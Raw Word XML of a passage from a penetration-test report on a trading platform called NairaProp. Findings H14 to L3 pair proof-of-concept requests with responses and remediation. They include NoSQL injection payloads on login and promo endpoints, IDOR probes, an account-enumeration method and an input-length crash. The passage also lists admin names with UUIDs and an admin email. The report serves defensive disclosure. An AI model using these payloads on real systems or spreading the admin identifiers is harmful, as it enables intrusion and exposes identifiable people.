          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /api/payments/manual-request {fullName: "A"*300}</w:t>
        <w:br/>
        <w:t>→ 500 {"error":"value too long for type character varying(255)"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Validate input length before DB query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H14: Payment Status Leaks Order Details (No Ownership Check)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-639</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/payments/status/{reference}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Any user can view any order by reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No ownership verification on payment status endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/payments/status/MP_MQYRA7PW_93CF7C4D</w:t>
        <w:br/>
        <w:t>→ {"success":true,"order":{"status":"manual_pending","challengeType":"50k","price":"4000.00"}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add user ownership check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H15: CORS Crash on Admin Dev Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-444, CWE-755</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/api/admin/dev/env/safe, /api/admin/dev/sql/run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Origin validation crash reveals server internals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Origin header causes 500 crash with Access-Control-Allow-Credentials: true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>See H4 above</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Fix CORS middleware error handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H16: Telegram Integration Endpoints Leak Configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/telegram/web/* + /telegram/mini-app/config</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Feature flags and internal version leaked</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Multiple Telegram endpoints leak platform configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/telegram/mini-app/config</w:t>
        <w:br/>
        <w:t>→ {"features":{"aiChat":true,"competitions":true,"affiliates":true,"squad":true},"version":"1.0.0"}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Restrict access to authenticated users only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
        </w:rPr>
        <w:t>H17: Admin Payout/Funded Account Endpoints Confirmed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: HIGH  |  CWE: CWE-548</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/admin/payouts, /admin/funded-accounts, /admin/manual-payments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Confirmation of financial infrastructure accessible via admin JWT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Admin endpoints confirmed to exist and require admin role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/admin/payouts → 403 "Admin access required"</w:t>
        <w:br/>
        <w:t>GET /api/admin/funded-accounts → 403 "Admin access required"</w:t>
        <w:br/>
        <w:t>POST /api/admin/payouts/{id}/process → exists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>These endpoints should not be discoverable; implement API gateway obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>MEDIUM Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M1: NoSQL Injection on Login (Blind)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-943</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>MongoDB operators accepted but no data extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>$gt, $ne, $where operators accepted in email field but all return generic 500 errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /auth/login {"email":{"$gt":""},"password":"test"} → 500 (no differential)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Reject MongoDB operators in input, add type validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M2: NoSQL Injection on Promo Validate (Blind)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-943</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/promo/validate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Same blind NoSQL injection — operators accepted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Same as M1 but on promo code validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>POST /promo/validate {"code":{"$gt":""}} → 500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Reject MongoDB operators in input</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M3: KYC Name Change 90-Day Cooldown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-287</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/kyc-verify/change-name</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Cooldown only prevents repeated abuse — first change is catastrophic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>First change is auto-approved; cooldown only prevents repeats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>can_change_now: false after first use; resets after 90 days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>First change should also require verification; 90 days is too long</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M4: Single Quote in UUID Path Causes 500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-209</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/orders/{uuid}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Leaked that value reaches database layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Trailing single quote causes 500 instead of 404.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>GET /api/orders/c5159b4d-...9855' → 500 (not 404)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add UUID format validation before database query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M5: Ghost Orders on External Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-200, CWE-863</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>https://naireduu.com.ng/api/checkout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>NE_ prefixed orders not tracked on NairaProp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Orders created on gateway create ghost orders with real payment URLs but no NairaProp counterpart.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>NE_* references return "Order not found" on NairaProp but have real orderIds on gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Sync gateway database with NairaProp, reject orphaned NE_ references</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CA8A04"/>
        </w:rPr>
        <w:t>M6: Password Reset — Account Enumeration Oracle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="CA8A04"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: MEDIUM  |  CWE: CWE-204</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>POST /api/auth/forgot-password + /api/auth/check-recovery-available</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Multiple methods to enumerate valid accounts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Two distinct account enumeration oracles found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Method 1: forgot-password</w:t>
        <w:br/>
        <w:t>- Real account + broken email → {"emailSent":false} + "result is not defined"</w:t>
        <w:br/>
        <w:t>- Working email → {"emailSent":true}</w:t>
        <w:br/>
        <w:t>- Fake email → {"emailSent":true} (generic)</w:t>
        <w:br/>
        <w:t>→ "result is not defined" = RAILS backend error = real account</w:t>
        <w:br/>
        <w:br/>
        <w:t>Method 2: check-recovery-available</w:t>
        <w:br/>
        <w:t>- shai@nairaprop.com → {"hasRecoveryPassword":true}</w:t>
        <w:br/>
        <w:t>→ Confirms account exists + has recoverable password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Return same response regardless of account existence, fix Backend ReferenceError leak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>LOW Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="256BEB"/>
        </w:rPr>
        <w:t>L1: UUID-Based Order References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="256BEB"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: LOW  |  CWE: CWE-639</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>GET /api/orders/{uuid}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Known UUIDs expose full order data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>IDOR exists if UUID is known, though UUIDs are not easily guessable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Only own orders returned for most endpoints; status endpoint lacks ownership check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Implement consistent ownership checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="256BEB"/>
        </w:rPr>
        <w:t>L2: No Account Lockout Notification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="256BEB"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: LOW  |  CWE: CWE-778</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Auth system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Users won't know their account is being brute-forced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>No notification sent when account is locked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>No email/SMS/push on lockout event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation: </w:t>
      </w:r>
      <w:r>
        <w:t>Add security notification on account lockout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>────────────────────────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="256BEB"/>
        </w:rPr>
        <w:t>L3: Admin UUIDs Disclosed in Order Data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="256BEB"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Severity: LOW  |  CWE: CWE-200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Order endpoints + user search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Impact: </w:t>
      </w:r>
      <w:r>
        <w:t>Admin user IDs enumerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>4 admin UUIDs extracted via user search.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:shd w:fill="f5f5f0" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Shai Admin: 4609e821-29c9-43f6-8b54-1b7c4cf3cf1f</w:t>
        <w:br/>
        <w:t>Brightyblue: fd14251d-35d2-4a3c-80ca-dbf0e930ef09</w:t>
        <w:br/>
        <w:t>PROSPER: 1cbc3bda-e146-459a-ad0f-2f34e0a07442</w:t>
        <w:br/>
        <w:t>Chioma: 042eec4e-f23b-4c45-bcfe-ba45786fee92</w:t>
      </w:r>
    </w:p>
    <w:p>
